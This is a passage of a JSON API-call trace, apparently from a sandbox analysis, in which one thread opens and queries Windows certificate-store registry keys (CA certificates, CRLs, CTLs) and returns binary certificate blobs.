Compatibility0\\x81\\x9f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob" + } + ], + "repeated": 0, + "id": 2294 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000062c" + } + ], + "repeated": 0, + "id": 2295 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 2296 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000628" + }, + { + "name": "ObjectAttributesName", + "value": "D559A586669B08F46A30A133F8A9ED3D038E2EA8" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8" + } + ], + "repeated": 0, + "id": 2297 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob" + } + ], + "repeated": 1, + "id": 2298 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xac\\xd8\\x0e\\xa2{\\xb7,\\xe7\\x00\\xdc\"rJ_\\x1e\\x92\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Is\\xe0\\x92\\xcf\\x8a\\x9e,\\xa5\\xf9\\x88I:[\\xac\\xfe8\\x95\\x94.\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\n\\xcf\\xebK\\x07\\xe7\\x03\\xa0\\x1fL\\xef(\\xeerV\\xf7Qu\\x91U\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xd6\\xed}\\xf5/\\xc1\\x9b\\xdc\\x9e_\\xe9\\xe2\\xbe!\\xfb\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xd5Y\\xa5\\x86f\\x9b\\x08\\xf4j0\\xa13\\xf8\\xa9\\xed=\\x03\\x8e.\\xa8 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x87\\x03\\x00\\x000\\x82\\x03\\x830\\x82\\x02\\xec\\xa0\\x03\\x02\\x01\\x02\\x02\\x10F\\xfc\\xeb\\xba\\xb4\\xd0/\\x0f\\x92`\\x98#?\\x93\\x07\\x8f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r970417000000Z\\x17\r161024235959Z0\\x81\\xba1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign International Server CA - Class 31I0G\\x06\\x03U\\x04\\x0b\\x13@www.verisign.com/CPS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob" + } + ], + "repeated": 0, + "id": 2299 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000062c" + } + ], + "repeated": 0, + "id": 2300 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 2301 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000628" + }, + { + "name": "ObjectAttributesName", + "value": "FEE449EE0E3965A5246F000E87FDE2A065FD89D4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4" + } + ], + "repeated": 0, + "id": 2302 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob" + } + ], + "repeated": 1, + "id": 2303 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xed\\xbc\\xcd\\xd5\\x10j\\x07\\x1c]\\x8bF\\x90\\x91\\x8eH\\xaa\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xfe\\xe4I\\xee\\x0e9e\\xa5$o\\x00\\x0e\\x87\\xfd\\xe2\\xa0e\\xfd\\x89\\xd4\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x9a\\xa6X\\x7f\\x94\\xdd\\x91\\xd9\\x1ec\\xdf\\xd3\\xf0\\xce_\\xae\\x18\\x93\\xaa\\xb7 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xce\\x01\\x00\\x000\\x82\\x01\\xca0\\x82\\x01t\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0\\x1e\\x17\r960528220259Z\\x17\r391231235959Z0\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0[0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03J\\x000G\\x02@\\x81U\"\\xb9\\x8a\\xa4o\\xed\\xd6\\xe7\\xd9f\\x0fU\\xbc\\xd7\\xcd\\xd5\\xbcN@\\x02!\\xa2\\xb1\\xf7\\x870\\x85^\\xd2\\xf2D\\xb9\\xdc\\x9bu\\xb6\\xfbF_B\\xb6\\x9d#6\\x0b\\xdeT\\x0f\\xcd\\xbd\\x1f\\x99*\\x10X\\x11\\xcb@\\xcb\\xb5\\xa7A\\x02\\x03\\x01\\x00\\x01\\xa3\\x81\\x9e0\\x81\\x9b0P\\x06\\x03U\\x04\\x03\\x04I\\x13GFor Testing Purposes Only Sample Software Publishing Credentials Agency0G\\x06\\x03U\\x1d\\x01\\x04@0>\\x80\\x10\\x12\\xe4\t-\\x06\\x1d\\x1dO\\x00\\x8da!\\xdc\\x16dc\\xa1\\x180\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency\\x82\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x00\\x03A\\x00-.>{\\x89B\\x89?\\xa8!" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob" + } + ], + "repeated": 0, + "id": 2304 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000062c" + } + ], + "repeated": 0, + "id": 2305 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000628" + } + ], + "repeated": 0, + "id": 2306 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs" + } + ], + "repeated": 0, + "id": 2307 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "KeyInformation", + "value": "N+h%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2308 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2309 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000628" + }, + { + "name": "ObjectAttributesName", + "value": "A377D1B1C0538833035211F4083D00FECC414DAB" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB" + } + ], + "repeated": 0, + "id": 2310 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob" + } + ], + "repeated": 1, + "id": 2311 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xa3w\\xd1\\xb1\\xc0S\\x883\\x03R\\x11\\xf4\\x08=\\x00\\xfe\\xccAM\\xab!\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb5\\x01\\x00\\x000\\x82\\x01\\xb10\\x82\\x01\\x1a\\x02\\x01\\x010\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000a1\\x110\\x0f\\x06\\x03U\\x04\\x07\\x13\\x08Internet1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign Commercial Software Publishers CA\\x17\r010324000000Z\\x17\r040107235959Z0i0!\\x02\\x10\\x1bQ\\x90\\xf77$9\\x9c\\x92T\\xcdBF7\\x99j\\x17\r010130000124Z0!\\x02\\x10u\\x0e@\\xff\\x97\\xf0G\\xed\\xf5V\\xc7\\x08N\\xb1\\xab\\xfd\\x17\r010131000049Z0!\\x02\\x10w\\xe6ZCY\\x93]_zu\\x80\\x1a\\xcd\\xad\\xc2\"\\x17\r000831000056Z\\xa0\\x1a0\\x180\t\\x06\\x03U\\x1d\\x13\\x04\\x020\\x000\\x0b\\x06\\x03U\\x1d\\x0f\\x04\\x04\\x03\\x02\\x05\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x00\\x03\\x81\\x81\\x00\\x18,\\xe8\\xfc\\x16m\\x91J=\\x88TH]\\xb8\\x11\\xbfd\\xbb\\xf9\\xdaY\\x19\\xdd\\x0ee\\xab\\xc0\\x0c\\xfag~!\\x1e\\x83\\x0e\\xcf\\x9b\\x89\\x8a\\xcf\\x0cK\\xc19\\x9d\\xe7j\\xacFtj\\x91b\"\r\\xc4\\x08\\xbd\\xf5\n\\x90\\x7f\\x06!=~\\xa7\\xaa^\\xcd\"\\x15\\xe6\\x0cu\\x8en\\xad\\xf1\\x84\\xe4\"\\xb40o\\xfbd\\x8f\\xd7\\x80C\\xf5\\x19\\x18f\\x1dr\\xa3\\xe3\\x94\\x82(R\\xa0\\x06N\\xb1\\xc8\\x92\\x0c\\x97\\xbe\\x15\\x07\\xabz\\xc9\\xea\\x08gCMQc;\\x9c\\x9c\\xcd" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob" + } + ], + "repeated": 0, + "id": 2312 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000062c" + } + ], + "repeated": 0, + "id": 2313 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000628" + } + ], + "repeated": 0, + "id": 2314 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CTLs" + } + ], + "repeated": 0, + "id": 2315 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2316 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000628" + } + ], + "repeated": 0, + "id": 2317 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2318 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" + } + ], + "repeated": 0, + "id": 2319 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000062c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" + } + ], + "repeated": 0, + "id": 2320 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2321 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000630" + } + ], + "repeated": 0, + "id": 2322 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000062c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CRLs" + } + ], + "repeated": 0, + "id": 2323 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2324 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000630" + } + ], + "repeated": 0, + "id": 2325 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000062c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CTLs" + } + ], + "repeated": 0, + "id": 2326 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000630" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2327 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000630" + } + ], + "repeated": 0, + "id": 2328 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000062c" + } + ], + "repeated": 0, + "id": 2329 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates" + } + ], + "repeated": 0, + "id": 2330 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2331 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000638" + } + ], + "repeated": 0, + "id": 2332 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\CRLs" + } + ], + "repeated": 0, + "id": 2333 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000638" + }, + { + "name": "KeyInformation", + "value": 